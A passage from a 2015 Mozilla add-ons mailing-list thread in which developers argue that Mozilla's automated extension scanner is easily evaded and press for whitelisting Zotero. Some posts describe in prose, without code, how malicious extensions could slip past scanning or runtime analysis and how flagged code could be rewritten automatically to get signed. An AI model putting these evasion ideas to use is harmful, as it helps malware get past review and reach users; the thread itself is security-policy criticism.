discussing that. We've been discussing the system Mozilla announced and
implemented, which involves an automated scanner and manual review for
extensions that fail it. Runtime limits are obviously the only way to
stop bad JS, and we're getting that with WebExtensions, but that's a
totally separate discussion. A discussion about whitelisting in the
context of WebExtensions (or runtime XPCOM interface restrictions, or
anything else) would take into account, among other things, the
capabilities requested in the extension manifest and the degree to which
those were presented to and agreed upon by the user. That is not the
current discussion.

> Yes, it is not capable of combating malware by anyone who 1) has
> the slightest bit of JS knowledge and 2) does not want to be detected.
>
>
> Signing, as you note repeatedly, gives us real tools to combat
> malware, especially side-loaded malware. It's important that we
> distinguish the two. However, you don't just attack the scanner,
> you're attacking the entire system. [1]

I'm not even sure what you're arguing at this point. I explicitly make
that distinction in the post. You know exactly what I'm attacking: an
automated scanner that provably cannot stop even trivial attempts at
malware but that will leave legitimate developers permanently in manual
review, and a strident opposition to whitelisting based on false claims
about what that scanner can do.

> In point 2 I suggest alterations that could be made to the new
> plan to both meaningfully increase user safety and avoid the
> serious drawbacks of the current plan in light of its sheer
> ineffectiveness.
>
>
> The roadblock of an initial review is smart, but potentially wouldn't
> scale well.

Fortunately, by dropping manual review based on pointless checks (which
Jorge now acknowledges is being "reconsidered"), reviewers will have
more time to scan initial submissions.

> ignoring the fact that Zotero has in effect been whitelisted
> for the last decade without that happening.
>
>
> "It hasn't happened before, so it won't happen in the future."

Not my argument. Jorge suggested code not reviewed by AMO inherently
goes bad in relatively short order. It didn't happen for Zotero in 10
years. That matters when evaluating risk.

> The issue isn't that you've suggested these as possibilities.
>
>
> That's really not true, IMO. You've reacted aggressively and
> dismissively to any statement that suggests we can't simply assume
> Zotero will never go bad. It could happen. Will it happen? Almost
> certainly not. But it'd be naive to not ensure the general policy has
> a remediation step if that unlikely event happens.

I've never claimed that nothing bad could ever happen with Zotero. I
have on some occasions pointed out the absurd steps that would need to
occur for some of those things to happen, compared to the far more
likely things that might occur with other extensions [1]. Strangely,
nobody responded to that one — which, incidentally, was the reason I
wrote this post.

I'm also the one who suggested remediation steps for the whitelist
proposal [2]. No one from Mozilla responded to those either.

> Again, and I keep saying this: I'm not worried about Zotero in
> particular, I just don't want Zotero's example to be the justification
> for a poorly conceived policy. (Or worse, an arbitrary set of
> exceptions.) I don't think that's an unfair position.

There's a finite number of times you can say that your concern is a
"poorly conceived policy" without making any tangible steps towards
forward progress before people might start to think you're not that
concerned about forward progress. As far as I can recall, you didn't
once respond to Gijs's actual proposed rules.

Again, if you and Jorge had approached this conversation by recognizing
months ago that Zotero should be whitelisted under any reasonable scheme
and that we just needed to work together to figure out the details,
things probably wouldn't have gotten to this very public point. Instead,
Jorge last week: "The issues with Zotero have been discussed many times
over already, and we currently don't have neither the capability nor the
intention of whitelisting add-ons."

Fortunately it's become clear in the last few days that other people
within Mozilla recognize that an extension like Zotero provides value
that should be protected, so it doesn't really matter to me that you
don't. And it's all irrelevant anyway, at least for now, because I've
demonstrated that forcing extensions into manual review based on
automated security checks makes no sense. When there's a different
reality to discuss, we can do so.

- Dan

[1]
https://groups.google.com/d/msg/mozilla.addons.user-experience/vxpElfVe_uo/WCGFFqvABgAJ
[2]
https://groups.google.com/d/msg/mozilla.addons.user-experience/3bAaITHf1Xo/ulnmgVeaAwAJ

Emiliano Heyns

unread,
Nov 27, 2015, 4:22:28 AM11/27/15
to mozilla-addons-...@lists.mozilla.org
On Thursday, November 26, 2015 at 8:16:27 PM UTC+1, Mike Connor wrote:

> >> (We've had some interesting conversations with a potential partner who's
> >> already doing runtime analysis of add-ons, but the tech is proprietary, so
> >> that's been slow.)

My personal take is that the main reason the likes of HP Fortify, Checkmarx, Veracode (because I'd venture to guess it's one of these three we're talking about, and if I'd have to bet I would pick Checkmarx) use the "proprietary" label would be because they too know you can't solve the halting problem. Proprietary is a much better, marketing-wise, than snake-oil. If it was more than that, you could bet your ass *someone* would set Slashdot alight after having gotten that Turing award or Schock prize.

> > Runtime analysis...which has no bearing on a discussion about an automated
> > scanner and manual review?
>
>
> The goal was to integrate directly with their tech via a web service. In
> more or less real time.

Real time. For the halting problem. That is funny.

> > I'm sorry, are you now saying that for the last three months you've been
> > arguing not about the scanning system that everyone else is talking about
> > but a magical future system that can catch someone who doesn't want to be
> > manually reviewed, which no one else weighing in on my post, including
> > other Mozilla engineers, seems to think is possible?
>
>
> Yes, I've been operating for the last year or so under the assumption that
> any meaningful automated scanning in the long term would require tech that
> isn't static analysis.
>
> (I have an unfortunate tendency toward assuming shared/equal context, and
> glossing over the details. Especially on things I've known for a long
> time. Aspie brain sucks.)

That it does (waves back), but Aspie brain should also make you favor logical thinking over magical thinking, and evidence over confidence. I can see why you'd make the claims you have if you were in fact operating under the stated assumption, but as an Aspie myself, I have no idea how you came to that assumption. There is zero indication that any progress has been made towards solving the halting problem, and that lack of progress is neatly explained by the fact that the solving of it involves a resolving a logical paradox. So unless this proprietary partner has deviced something that can compute its way out of a logical paradox, here's the options I can think of they might offer:

1. static analysis, with, most likely, a larger base of samples (not patterns). But that won't help you much because that stockpile of samples will be focused on web-threats like XSS, not the kind of things JS can do in the rather unique Firefox chrome environment. AAMOF the Mozilla scanner is likely to be ahead on this

2. runtime analysis as an attempt to brute-force their way through the halting problem, probably again meant to find known-bad behavior given typical input. But Dan's PoC doesn't react to typical input, only very specific input, and it could easily escape behavior detection by only kicking in an hour after startup. A user is likely to have the browser running more than an hour, but it's unlikely the test will be allowed to run for that amount of time.

If this assessment is mistaken I'd *love* to know who this partner is so I can gear my analysis towards their specific product. If this partner isn't willing to disclose name or method, I'd have zero trust in them.

> Signing, as you note repeatedly, gives us real tools to combat malware,
> especially side-loaded malware. It's important that we distinguish the
> two. However, you don't just attack the scanner, you're attacking the
> entire system. [1]

That is because the scanner in fact breaks the entire system. The system as a whole is premised on the idea that code is vetted before release; the scanner does triage to see which extensions are innocent enough to be signed without any intervention, and which require manual review. But since the scanner can trivially be made to think that an extension is innocent even when an extension plainly advertises in code & documentation that it is malicious, no extension, regardless of intent, will ever pass through manual review unless it volunteers to do so.

This is much like claiming your home security system is safe because no-one you're familiar with knows that you keep the code to the alarm on a post-it on the garage door.... but attempts at entry will nicely list "you can't enter unless you enter the pincode that's pinned to the garage door" (all the while not alerting anyone of those attempts). This is exacerbated by the fact that extension IDs and user accounts are free and easy to create.

I think I hear Dan agreeing that signing will have benefits. In principle, code vetting would *also* have benefits, except:

1. If you're a legit dev, they're a pain, because they're slow. In a normal development process, you could plan ahead to reserve resources for such vetting, and the vetters would inspect the code as it is checked in to do incremental checks. This way, when release time is near, very little code vetting (if any) remains, and process proceeds unhampered. The Mozilla review process doesn't allow for any of this. You can only submit your code as a whole, and there is absolutely no way to know when you'll be scheduled for a review, or how long it will take, except that precedent says "in 7 weeks, on average" and "depends on who's doing the review". You have zero insight when reviewers take holidays, what their rotation schedule is, you name it. I never thought I'd see the day when a bureaucratic release process would seem a vast improvement in release times.

2. If you're a malicious dev, you can opt out by tweaking your extension in trivial ways to get signed automatically, and you forego the whole problem. Hell, a conscientious dev might choose to go this route to release an emergency fix.

The reason a legit dev would not choose option 2 is because getting your extension ID or AMO account banned would be a huge nuisance. But someone with ill intent could very easily just pick option 2. If they're caught, the fact that it is now known that they evade code vetting by gaming the scanner is not their problem -- the fact that they're outed as a malicious agent is, and the risk of being found out that way is bigger with option 1 than with option 2.

So pretty much by design, you're only going to catch the people who have good intent but (perhaps) lesser software development skills. It's a stretch to say that Zotero fits that category, and their past few reviews bear that out.

> The roadblock of an initial review is smart, but potentially wouldn't scale
> well.

Then how is perpetual review going to scale?

> That's really not true, IMO. You've reacted aggressively and dismissively
> to any statement that suggests we can't simply assume Zotero will never go
> bad.

If a judge would make you go through an extensive security scan every day you try to enter your office because he deems it plausible you *might* at some point go rogue would irk most people I know. It certainly doesn't help that in the next line over, people who no one has seen before who are carrying jerrycans and banners proclaiming "I'm going to rob the place and burn it down!" are waved through with a smile.

> It could happen. Will it happen? Almost certainly not. But it'd be
> naive to not ensure the general policy has a remediation step if that
> unlikely event happens.

No one has asked for a system without remediation steps. The remediation steps are already present (blocking/reject whitelist status) and no one is arguing those should not be there. Dan has in fact stated that these remediation features are viable benefits of signing extensions.

> Again, and I keep saying this: I'm not worried about Zotero in particular,
> I just don't want Zotero's example to be the justification for a poorly
> conceived policy. (Or worse, an arbitrary set of exceptions.) I don't
> think that's an unfair position.

But there *already is* a poorly conceived policy *and* an arbitrary set of exceptions. The scanner triage makes sure of that. I agree that if auto-signing would not exist, Dan's argument wouldn't work. But it does exist. Which means people can arbitrarily choose to have anything signed if they don't care about the reputation attached to an unvetted email address ("watch out people, whomever has access to m8r-m...@mailinator.com should not be trusted!") should they get caught, with risk of being caught no greater than it ever was.

Emiliano Heyns

unread,
Nov 29, 2015, 7:21:23 AM11/29/15
to mozilla-addons-...@lists.mozilla.org
BTW, there is also the fun fact that it would be simple to change the scanner by combining it with modifications of existing javascript beautfiers (the scanner walks the AST and marks problem spots, the beautifier walks the AST and regenerates javascript source) to go over an extension and fully automatically modify the problem spots, using variants on Dan's sample, to create a tool that makes sure your extension passes for automated signing. Not a few minutes work, but not actually hard to do.
0 new messages